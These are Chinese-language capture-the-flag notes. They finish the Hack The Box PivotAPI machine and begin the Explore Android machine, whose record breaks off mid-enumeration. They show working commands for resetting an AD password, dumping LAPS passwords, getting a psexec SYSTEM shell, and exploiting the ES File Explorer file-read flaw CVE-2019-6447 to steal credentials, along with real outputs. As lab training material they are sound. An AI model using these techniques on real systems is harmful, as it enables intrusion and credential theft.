在这个复杂的域环境中,对象多的让人头皮发麻,但请时刻牢记我们的最终目的--拿下域管理员!!因此我们依旧可以利用bloodhound查看通往域管理员的最短攻击路径:
2024-02-09-22-40-39
2024-02-09-22-47-48
比如从我们已经占据的目标(💀️标注)出发,表明PSRemote方式可以尝试。

利用LAPS获取域管理员凭据

先回到已经拿到的稳定ssh连接中,查看一下具体的域群组情况:

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups /domain

Group Accounts for \\PIVOTAPI

-------------------------------------------------------------------------------
*Key Administrators
*Organization Key Administrators
*Enterprise Administrators
*Schema Administrators
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Read-only Domain Controllers
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.

其中,LAPS ADMLAPS READ是我们最感兴趣的组。

LAPS ADMLAPS READ是与权限提升相关的组。LAPS代表Local Administrator Password Solution(本地管理员密码解决方案),它是一种微软提供的工具,用于自动管理和轮换计算机本地管理员密码。这两个组的目的是控制对LAPS功能的访问权限。
LAPS ADM组通常用于授予用户权限,使其能够管理和更改计算机的本地管理员密码。成员可以使用LAPS工具来重置、更改和查看计算机的本地管理员密码。
LAPS READ组通常用于授予用户权限,使其能够查看计算机的本地管理员密码,但不能更改或重置密码。这通常用于需要监视或审核本地管理员密码的安全团队或其他特定角色的用户。

如果我们拿到了LAPS READ组,就相当于拿到了域中管理员权限,查看一下这两个组的成员:

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS READ" /domain

Group Name     LAPS READ
Comment

Members

-------------------------------------------------------------------------------
cybervaca                lothbrok
The command completed successfully.

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS ADM" /domain

Group Name     LAPS ADM
Comment

Members

-------------------------------------------------------------------------------
cybervaca
The command completed successfully.

说明这两个组中,用户cybervaca具有最高权限,回到最初bloodhound账户操作员组直接控制外部对象图,发现能够完全控制lothbrok,但没有cybervaca,所以我们可以通过gibdeon修改lothbrok的密码,这条攻击路径相对于其他的路径更容易,可以尝试:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'gibdeon%cvestone!666' 10.129.229.178
rpcclient $> setuserinfo2 lothbrok 23 'cvestone.com666'
rpcclient $> 

拿下lothbrok,接下来就可以利用工具查看laps密码,搜索工具如下:
2024-02-10-20-07-12
运行该脚本:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 dump_laps.py -u lothbrok -p cvestone.com666 -d LicorDebellota.htb -l 10.129.229.178
LAPS Dumper - Running at 02-10-2024 20:29:27
PIVOTAPI 2UF4969F52FbRvF2tap0

我们拿到了域管理员的权限,验证一下:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.229.178 -u Administrador -p '2UF4969F52FbRvF2tap0'
SMB         10.129.229.178  445    PIVOTAPI         [*] Windows 10.0 Build 17763 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.178  445    PIVOTAPI         [+] LicorDeBellota.htb\Administrador:2UF4969F52FbRvF2tap0 (Pwn3d!)

并且这里标注了Pwn3d!说明我们确实拿下了这台机器

这里一定要注意:由于这个机器的语种不是英语,所以相应的管理员名字是不一样的,这个可以通过net user查看

但是现在问题就是该如何连接域管理员的shell,可以先在bloodhound查看之前的服务组成员中是否包含域管理员:
2024-02-10-20-39-50
2024-02-10-20-40-51
显然都不包含。

利用psexec连接域管理员shell

在这种情况下,我们其实还可以尝试impacket套件中的psexec:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Administrador:'2UF4969F52FbRvF2tap0'@10.129.229.178              
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.229.178.....
[*] Found writable share ADMIN$
[*] Uploading file TweoOztV.exe
[*] Opening SVCManager on 10.129.229.178.....
[*] Creating service glyR on 10.129.229.178.....
[*] Starting service glyR.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [Versi�n 10.0.17763.1879]

(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

那么既然可以通过这种方式连接shell,为什么我们在之前不考虑呢?因为权限不够,所以一般不优先选择这种连接方式,如下:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Jari:'Cos@Chung@!RPG'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
    
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py 3v4Si0N:'Gu4nCh3C4NaRi0N!23'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.

然而我们并没有在这个域管理员的家目录和桌面看到最终的flag:

C:\Windows\system32> cd c:\users\Administrador

c:\Users\administrador> cd Desktop

c:\Users\administrador\Desktop> dir
 El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
 El n�mero de serie del volumen es: 94DB-AFCA


 Directorio de c:\Users\administrador\Desktop

28/04/2021  22:36    <DIR>          .
28/04/2021  22:36    <DIR>          ..
               0 archivos              0 bytes
               2 dirs   4.520.017.920 bytes libres

c:\Users\administrador\Desktop> cd ..

c:\Users\administrador> dir
 El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
 El n�mero de serie del volumen es: 94DB-AFCA


 Directorio de c:\Users\administrador

11/08/2020  16:32    <DIR>          .
11/08/2020  16:32    <DIR>          ..
09/08/2020  16:06    <DIR>          3D Objects
09/08/2020  16:06    <DIR>          Contacts
28/04/2021  22:36    <DIR>          Desktop
09/08/2020  16:06    <DIR>          Documents
10/08/2020  17:21    <DIR>          Downloads
09/08/2020  16:06    <DIR>          Favorites
09/08/2020  16:06    <DIR>          Links
09/08/2020  16:06    <DIR>          Music
09/08/2020  16:06    <DIR>          Pictures
09/08/2020  16:06    <DIR>          Saved Games
09/08/2020  16:06    <DIR>          Searches
09/08/2020  16:06    <DIR>          Videos
               0 archivos              0 bytes
              14 dirs   4.520.017.920 bytes libres

但是联想到在LAPS相关组中,用户cybervaca也和管理员权限差不多了,可以尝试,并且这个用户名正好是这台机器的作者^w^

c:\Users\administrador> cd ..\cybervaca\Desktop

c:\Users\cybervaca\Desktop> dir
 El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
 El n�mero de serie del volumen es: 94DB-AFCA


 Directorio de c:\Users\cybervaca\Desktop

30/04/2021  09:31    <DIR>          .
30/04/2021  09:31    <DIR>          ..
10/02/2024  13:19                34 root.txt
               1 archivos             34 bytes
               2 dirs   4.520.226.816 bytes libres

tc:\Users\cybervaca\Desktop>type root.txt
9f91a2b8bdfab265d51b101db6fe3dc8

最终的flag即9f91a2b8bdfab265d51b101db6fe3dc8

拓展尝试

(待)

总结

(待复盘时总结)

Explore

“红队笔记”学习记录

机器介绍

Explore is an easy difficulty Android machine. Network enumeration reveals a vulnerable service that is exploitable via a Metasploit module, and gives restricted read access to the machine. Further enumeration of the files, reveals the SSH credentials of a system user, allowing this way remote access to the machine. Finally, the attacker is able to forward a filtered port locally using SSH tunneling, in order to access the Android shell over the Android Debug Bridge (ADB). This eventuality allows the attacker to execute commands as the root user.
探索是一个容易难度的Android机器。网络枚举揭示了可通过 Metasploit 模块利用的易受攻击的服务,并提供对计算机的有限读取访问权限。进一步枚举文件,显示系统用户的 SSH 凭据,从而允许以这种方式远程访问计算机。最后,攻击者能够使用 SSH 隧道在本地转发过滤的端口,以便通过 Android 调试桥 (ADB) 访问 Android shell。这种可能性允许攻击者以 root 用户身份执行命令。

难度

Easy

信息搜集

tcp全端口扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 16:17 CST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 11.98% done; ETC: 16:18 (0:01:13 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 26.79% done; ETC: 16:18 (0:01:03 remaining)
Nmap scan report for 10.129.230.80 (10.129.230.80)
Host is up (0.19s latency).
All 65535 scanned ports on 10.129.230.80 (10.129.230.80) are in ignored states.
Not shown: 64652 filtered tcp ports (no-response), 883 closed tcp ports (conn-refused)

Nmap done: 1 IP address (1 host up) scanned in 87.29 seconds
              
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --min-rate 10000 -p- 10.129.178.12 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:32 CST
Warning: 10.129.178.12 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.29s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
15262/tcp filtered unknown
30972/tcp filtered unknown
32708/tcp filtered unknown
33415/tcp filtered unknown
35169/tcp open     unknown
42135/tcp open     unknown
59777/tcp open     unknown
62324/tcp filtered unknown
64451/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds

这里尝试分别指定-sT和不指定,结果指定了反而扫描不出来,所以nmap扫描有时候不是死板的,要多尝试
将结果筛选出端口进行数据处理一下,方便后续使用:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ports=$(grep /tcp nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')     
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# echo $ports  
2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451

tcp详细扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT -sC -sV -O -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:50 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.24s latency).

PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
5555/tcp  filtered freeciv
15262/tcp closed   unknown
30972/tcp closed   unknown
32708/tcp closed   unknown
33415/tcp closed   unknown
35169/tcp closed   unknown
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
62324/tcp closed   unknown
64451/tcp closed   unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.94SVN%I=7%D=2/20%Time=65D44BD2%P=x86_64-pc-linux-gnu%r
SF:(NULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/20%OT=2222%CT=15262%CU=44075%PV=Y%DS=2%DC=I%G=Y%T
OS:M=65D44BEB%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=C)SEQ(SP=105%GCD=1%ISR=109%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST
OS:11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M53CST11NW6%O5=M53CST11NW6%O6=M5
OS:3CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%
OS:T=40%W=FFFF%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Device: phone

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.12 seconds

udp扫描:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.178.12 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:24 CST
Stats: 0:04:10 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:03 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:06 remaining)
Stats: 0:14:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 79.06% done; ETC: 14:43 (0:03:52 remaining)
Stats: 0:18:55 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.99% done; ETC: 14:43 (0:00:00 remaining)
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.28s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT      STATE         SERVICE
1900/udp  open|filtered upnp
3130/udp  open|filtered squid-ipc
5353/udp  open|filtered zeroconf
6050/udp  open|filtered x11
18985/udp open|filtered unknown
21948/udp open|filtered unknown
36458/udp open|filtered unknown
49306/udp open|filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 1150.51 seconds

脚本漏扫:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:42 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.37s latency).

PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
15262/tcp closed   unknown
30972/tcp closed   unknown
32708/tcp closed   unknown
33415/tcp closed   unknown
35169/tcp closed   unknown
42135/tcp open     unknown
59777/tcp open     unknown
62324/tcp closed   unknown
64451/tcp closed   unknown

Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds

扫描结果分析

首先从nmap扫描结果显示设备可能是phone,然后2222端口运行的ssh服务器(开发者单位可能叫Banana Studio),42135端口运行ES文件浏览器,这是安卓系统很常用的软件,59777端口运行一种Minecraft游戏对应的JSONAPI,在这里暂时还没有啥思路,可以先对这几个陌生的名字搜索一下:

拨开云雾见月明

2024-02-20-15-02-26
证实了我们的猜想
2024-02-20-15-03-32
搜索freeciv
2024-02-20-15-09-45
了解到是freeciv用于创建游戏多用户服务器的 ,但通常该端口也可能用于Android Debug Bridge(ADB),实际上是一个shell,并且该端口被过滤,是ADB的可能性比较大。

注意:在搜索过程中,一定要把所有与其相关的独特的关键字结合在一起搜索,这样才会更精准

利用

寻找公开漏洞

接下来可以根据已经找到的潜在攻击面-端口暴露的应用程序,来寻找潜在的公开漏洞,可以先通过searchsploit再通过搜索引擎或github等:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana studio
Exploits: No Results
Shellcodes: No Results
                                                                                                                                                                               
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana       
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                               |  Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Banana Dance - Cross-Site Scripting / SQL Injection                                                                                          | php/webapps/37646.txt
banana dance b.2.6 - Multiple Vulnerabilities                                                                                                | php/webapps/23573.txt
Banana Dance CMS and Wiki - SQL Injection                                                                                                    | php/webapps/17919.txt
Bananadance Wiki b2.2 - Multiple Vulnerabilities                                                                                             | php/webapps/22654.txt
Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation                                                                                    | hardware/local/40271.txt
Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting                                                                           | cfm/webapps/26882.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

显然和我们遇到的情况不匹配,换一个程序的关键词:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit ES File Explorer
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                               |  Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities                                                                                 | php/webapps/51615.txt
ES File Explorer 4.1.9.7.4 - Arbitrary File Read                                                                                             | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal                                                                                                 | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure                                                                                    | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)                                                      | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)                                                          | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)                                                          | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)                                                                | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                                                                 | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution                                          | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access                                              | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write                                     | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification                        | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                                                              | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                                                               | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access                                                                                            | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                                                            | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                                                                    | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                                                          | php/webapps/35851.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

显然第二个匹配,虽然不知道具体版本,但是可以尝试,先将对应的exp下载下来:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit -m 50070        
  Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
      URL: https://www.exploit-db.com/exploits/50070
     Path: /usr/share/exploitdb/exploits/android/remote/50070.py
    Codes: CVE-2019-6447
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/cvestone/Desktop/htb/Explore/50070.py
                   
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ls
10.129.178.12.gnmap  10.129.178.12.nmap  10.129.178.12.xml  50070.py  Explore.pdf  nmapscan

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# head -n 20 50070.py
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447

import requests
import json
import ast
import sys

if len(sys.argv) < 3:
    print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
    sys.exit(1)

url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]

ES File Explorer任意文件读取

这是利用任意文件读取漏洞的exp,从源码中可以知道用法,试着执行:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getDeviceInfo 10.129.178.12

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : VMware Virtual Platform
ftpRoot : /sdcard
ftpPort : 3721

#先查看所有的图片文件,而不是列出所有文件,因为太多了不优先考虑
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py listPics 10.129.178.12

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)

name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)

name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)

name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)

在这里发现creds.jpg是最令我们感兴趣的,而其他的在读取之后感觉并没有太多利用价值,可以下载该图片:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getFile 10.129.178.12 /storage/emulated/0/DCIM/creds.jpg                                                                                                 

==================================================================
|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    |
|                Coded By : Nehal a.k.a PwnerSec                 |
==================================================================

[+] Downloading file...

[+] Done. Saved as `out.dat`.

2024-02-20-16-07-34
看着像一个凭据,先记录下来:kristi:Kr1sT!5h@Rp3xPl0r3!
但是这里的大小写存在判断失误的可能性,所以如果错误要记得多尝试不同可能性,接下来显然可以尝试是否是ssh的凭据

获取立足点

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh kristi@10.129.178.12 -p 2222
Unable to negotiate with 10.129.178.12 port 2222: no matching host key type found. Their offer: ssh-rsa

这个错误通常表示SSH客户端和服务器之间无法达成一致的加密算法和主机密钥类型,从而导致连接失败。因此,可以尝试使用SSH客户端命令中的"-o"选项,指定与服务器提供的主机密钥类型匹配的算法

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -oHostKeyAlgorithms=ssh-rsa kristi@10.129.178.12 -p 2222
The authenticity of host '[10.129.178.12]:2222 ([10.129.178.12]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.129.178.12]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@10.129.178.12) Password: 
127|:/ $ whoami
u0_a76
:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

显然这是个普通用户,看看都有啥文件:

:/ $ ls -liah
total 1.4M
  5231 drwxrwxrwt  15 root   root    980 2024-02-19 22:42 .
  5231 drwxrwxrwt  15 root   root    980 2024-02-19 22:42 ..
     1 dr-xr-xr-x  52 root   root      0 2024-02-19 22:42 acct
  5240 lrwxrwxrwx   1 root   root     11 2024-02-19 22:42 bin -> /system/bin
  5241 lrwxrwxrwx   1 root   root     50 2024-02-19 22:42 bugreports -> /data/user_de/0/com.android.shell/files/bugreports
  5575 drwxrwx---   6 system cache   120 2024-02-19 22:42 cache
  5243 lrwxrwxrwx   1 root   root     13 2024-02-19 22:42 charger -> /sbin/charger
  5519 drwxr-xr-x   3 root   root      0 2024-02-19 22:42 config
  5245 lrwxrwxrwx   1 root   root     17 2024-02-19 22:42 d -> /sys/kernel/debug
163842 drwxrwx--x  37 system system 4.0K 2021-03-15 16:49 data
  5247 -rw-------   1 root   root   1.0K 2024-02-19 22:42 default.prop
  5304 drwxr-xr-x  16 root   root   2.6K 2024-02-19 22:42 dev
  5249 lrwxrwxrwx   1 root   root     11 2024-02-19 22:42 etc -> /system/etc
  5250 -rw-r-----   1 root   root    753 2024-02-19 22:42 fstab.android_x86_64
  5251 -rwxr-x---   1 root   root   2.2M 2024-02-19 22:42 init
  5252 -rwxr-x---   1 root   root   3.3K 2024-02-19 22:42 init.android_x86_64.rc
  5253 -rwxr-x---   1 root   root   1.0K 2024-02-19 22:42 init.environ.rc
  5254 -rwxr-x---   1 root   root    29K 2024-02-19 22:42 init.rc
  5255 -rwxr-x---   1 root   root    582 2024-02-19 22:42 init.superuser.rc
  5256 -rwxr-x---   1 root   root   7.5K 2024-02-19 22:42 init.usb.configfs.rc
  5257 -rwxr-x---   1 root   root   5.5K 2024-02-19 22:42 init.usb.rc
  5258 -rwxr-x---   1 root   root    511 2024-02-19 22:42 init.zygote32.rc
  5259 -rwxr-x---   1 root   root    875 2024-02-19 22:42 init.zygote64_32.rc
  5404 lrwxrwxrwx   1 root   root     10 2024-02-19 22:42 lib -> system/lib
  5311 drwxr-xr-x  11 root   system  240 2024-02-19 22:42 mnt
  5261 drwxr-xr-x   2 root   root    220 2024-02-19 22:42 odm
  5271 drwxr-xr-x   2 root   root     40 2024-02-19 22:42 oem
  5272 -rw-r--r--   1 root   root    23K 2024-02-19 22:42 plat_file_contexts
  5273 -rw-r--r--   1 root   root   7.0K 2024-02-19 22:42 plat_hwservice_contexts
  5274 -rw-r--r--   1 root   root   6.5K 2024-02-19 22:42 plat_property_contexts
  5275 -rw-r--r--   1 root   root   1.2K 2024-02-19 22:42 plat_seapp_contexts
  5276 -rw-r--r--   1 root   root    14K 2024-02-19 22:42 plat_service_contexts
     1 dr-xr-xr-x 184 root   root      0 2024-02-19 22:42 proc
  5278 lrwxrwxrwx   1 root   root     15 2024-02-19 22:42 product -> /system/product
  5279 drwxr-x---   2 root   root    140 2024-02-19 22:42 sbin
  5285 lrwxrwxrwx   1 root   root     21 2024-02-19 22:42 sdcard -> /storage/self/primary
  5286 -rw-r--r--   1 root   root   357K 2024-02-19 22:42 sepolicy
  5534 drwxr-xr-x   4 root   root     80 2024-02-19 22:42 storage
     1 dr-xr-xr-x  12 root   root      0 2024-02-19 22:42 sys
     2 drwxr-xr-x  18 root   root   4.0K 2020-03-25 00:12 system
  5290 -rw-r--r--   1 root   root    464 2024-02-19 22:42 ueventd.android_x86_64.rc
  5291 -rw-r--r--   1 root   root   5.0K 2024-02-19 22:42 ueventd.rc
  5292 lrwxrwxrwx   1 root   root     14 2024-02-19 22:42 vendor -> /system/vendor
  5293 -rw-r--r--   1 root   root   6.9K 2024-02-19 22:42 vendor_file_contexts
  5294 -rw-r--r--   1 root   root      0 2024-02-19 22:42 vendor_hwservice_contexts
  5295 -rw-r--r--   1 root   root    392 2024-02-19 22:42 vendor_property_contexts
  5296 -rw-r--r--   1 root   root      0 2024-02-19 22:42 vendor_seapp_contexts
  5297 -rw-r--r--   1 root   root      0 2024-02-19 22:42 vendor_service_contexts
  5298 -rw-r--r--   1 root   root     65 2024-02-19 22:42 vndservice_contexts

